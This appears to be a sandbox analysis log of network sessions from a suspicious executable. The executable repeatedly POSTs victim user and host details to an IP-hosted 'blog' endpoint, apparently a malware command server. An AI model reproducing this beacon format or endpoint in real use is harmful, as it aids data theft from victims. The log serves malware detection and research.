Apr 25, 2024 09:42:12.161058903 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:12.161421061 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:12.161596060 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:12.161608934 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:12.161775112 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49761	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:12.423264980 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:12.554119110 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:13.559456110 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:12 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:13.559639931 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:13.559693098 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:13.574517012 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:13.575109959 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:13.575181007 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:13.575377941 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:42:13.575388908 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:42:13.575438023 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:42:13.575459003 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49762	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:13.826992989 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:13.957707882 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:14.795881033 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:13 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:14.796097040 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:14.796113014 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:14.805701017 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:14.806463957 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:14.806490898 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:14.806750059 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:42:14.806762934 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:42:14.806868076 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:42:14.806921959 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49763	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:15.058675051 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:15.188554049 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:16.026596069 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:15 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:16.026631117 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:16.026647091 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:16.035516977 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:16.035778046 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:16.036103964 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:16.036222935 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:16.036348104 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:16.036387920 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:16.036433935 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49764	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:16.290446043 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:16.416588068 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:17.244680882 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:16 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:17.244985104 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:17.244997025 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:17.255544901 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:17.255914927 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:17.256104946 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:17.256175041 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:17.256627083 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:17.256705999 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:17.256825924 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:17.524611950 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:17.650319099 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
